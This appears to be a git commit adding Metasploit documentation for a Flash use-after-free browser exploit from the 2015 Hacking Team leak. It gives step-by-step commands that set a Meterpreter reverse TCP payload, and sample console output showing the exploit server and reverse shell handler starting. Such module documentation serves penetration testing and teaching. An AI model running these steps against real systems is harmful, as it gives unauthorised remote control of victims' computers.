Documentation on adobe_flash_hacking_team_uaf
parent
91c7a1bc34
commit
4b36a42eff
|
@ -0,0 +1,75 @@
|
||||||
|
##Description
|
||||||
|
|
||||||
|
This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on:
|
||||||
|
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
|
||||||
|
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
|
||||||
|
Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
|
||||||
|
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and
|
||||||
|
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf```
|
||||||
|
2. Do: ```set payload windows/meterpreter/reverse_tcp```
|
||||||
|
2. Do: ```set LHOST [IP]```
|
||||||
|
3. Do: ```set SRVHOST [IP]```
|
||||||
|
3. Do: ```set URIPATH / [PATH]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Sample Output
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf
|
||||||
|
msf exploit(adobe_flash_hacking_team_uaf) > set payload windows/meterpreter/reverse_tcp
|
||||||
|
payload => windows/meterpreter/reverse_tcp
|
||||||
|
msf exploit(adobe_flash_hacking_team_uaf) > set lhost 172.16.178.160
|
||||||
|
lhost => 172.16.178.160
|
||||||
|
msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.160
|
||||||
|
srvhost => 172.16.178.160
|
||||||
|
msf exploit(adobe_flash_hacking_team_uaf) > set uripath /
|
||||||
|
uripath => /
|
||||||
|
msf exploit(adobe_flash_hacking_team_uaf) > show options
|
||||||
|
|
||||||
|
Module options (exploit/multi/browser/adobe_flash_hacking_team_uaf):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
Retries true no Allow the browser to retry the module
|
||||||
|
SRVHOST 172.16.178.160 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
|
||||||
|
SRVPORT 8080 yes The local port to listen on.
|
||||||
|
SSL false no Negotiate SSL for incoming connections
|
||||||
|
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||||
|
URIPATH / no The URI to use for this exploit (default is random)
|
||||||
|
|
||||||
|
|
||||||
|
Payload options (windows/meterpreter/reverse_tcp):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||||
|
LHOST 172.16.178.160 yes The listen address
|
||||||
|
LPORT 4444 yes The listen port
|
||||||
|
|
||||||
|
|
||||||
|
Exploit target:
|
||||||
|
|
||||||
|
Id Name
|
||||||
|
-- ----
|
||||||
|
0 Windows
|
||||||
|
|
||||||
|
|
||||||
|
msf exploit(adobe_flash_hacking_team_uaf) > exploit
|
||||||
|
[*] Exploit running as background job.
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 172.16.178.160:4444
|
||||||
|
[*] Using URL: http://172.16.178.160:8080/
|
||||||
|
[*] Server started.
|
||||||
|
msf exploit(adobe_flash_hacking_team_uaf) > [*] 172.16.178.203 adobe_flash_hacking_team_uaf - Gathering target information for 172.16.178.203
|
||||||
|
[*] 172.16.178.203 adobe_flash_hacking_team_uaf - Sending HTML response to 172.16.178.203
|
||||||
|
```
|
Loading…
Reference in New Issue